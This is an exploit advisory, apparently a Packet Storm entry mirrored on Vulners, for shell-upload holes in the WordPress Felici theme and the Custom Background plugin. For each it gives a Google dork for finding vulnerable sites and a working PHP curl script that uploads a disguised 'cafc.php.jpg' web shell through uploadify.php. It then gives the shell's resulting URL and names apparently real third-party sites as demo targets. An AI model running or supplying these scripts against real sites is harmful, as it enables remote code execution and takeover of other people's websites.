Lucene search

WordPress Felici / Custom Background Shell Upload

🗓️ 22 Mar 2014 00:00:00Reported by CaFc VersaceType

packetstorm🔗 packetstormsecurity.com👁 34 Views

WordPress Felici and Custom Background Shell Upload, Windows 7, CaFc Versac

`######################################################################################  
# Exploit Title : WordPress Felici Shell Upload  
# Google Dork : inurl:"/wp-content/themes/felici/"  
# Date : 23-03-2014  
# Exploit Author : CaFc Versace  
# Vendor Homepage : http://wordpressnull.com/themeforest-felici-v1-7-wordpress-magazine-theme/  
# Tested on : Windows 7  
# Contact : dwi[@]cooyy.net, cafc[@]surabayablackhat.org  
#######################################################################################  
  
  
Prooft:  
-------------------------------------------------------------------------------------  
<?php  
  
$uploadfile="cafc.php.jpg";  
  
$ch = curl_init("http://127.0.0.1/wp-content/themes/felici/sprites/js/uploadify/uploadify.php");  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch);  
print "$postResult";  
  
?>  
-------------------------------------------------------------------------------------  
  
  
Exploit:  
-------------------------------------------------------------------------------------  
Shell Access : http://victim/wp-content/themes/felici/sprites/js/cufon-fonts/uploaded/cafc.php.jpg   
---------------------------------------------------------------------------------------  
Demo : http://theportlander.co.uk/wp-content/themes/felici/sprites/js/uploadify/uploadify.php  
---------------------------------------------------------------------------------------  
  
  
######################################################################################  
# Exploit Title : WordPress Custom Background Shell Upload  
# Google Dork : inurl:"/wp-content/plugins/custom-background/"  
# Date : 23-03-2014  
# Exploit Author : CaFc Versace  
# Tested on : Windows 7  
# Contact : dwi[@]cooyy.net, cafc[@]surabayablackhat.org  
#######################################################################################  
  
  
Prooft:  
-------------------------------------------------------------------------------------  
<?php  
$uploadfile="cafc.php.jpg";  
$ch =  
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,  
array('Filedata'=>"@$uploadfile",  
'folder'=>'/wp-content/plugins/custom-background/uploadify/'));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch);  
print "$postResult";  
?>  
-------------------------------------------------------------------------------------  
  
  
Exploit:  
-------------------------------------------------------------------------------------  
Shell Access : http://localhost/wp-content/plugins/custom-background/uploadify/cafc.php.jpg  
or find ur shell at : http://localhost/wp-content/uploads/[years]/[month]/  
---------------------------------------------------------------------------------------  
Demo : http://lakeofthewoodsmn.com/wp-content/plugins/custom-background/uploadify/uploadify.php  
---------------------------------------------------------------------------------------  
  
  
Credits: Agency CaFc  
Thanks : SurabayaBlackhat  
  
  
./learn to be better  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

22 Mar 2014 00:00Current

0.6Low risk

Vulners AI Score0.6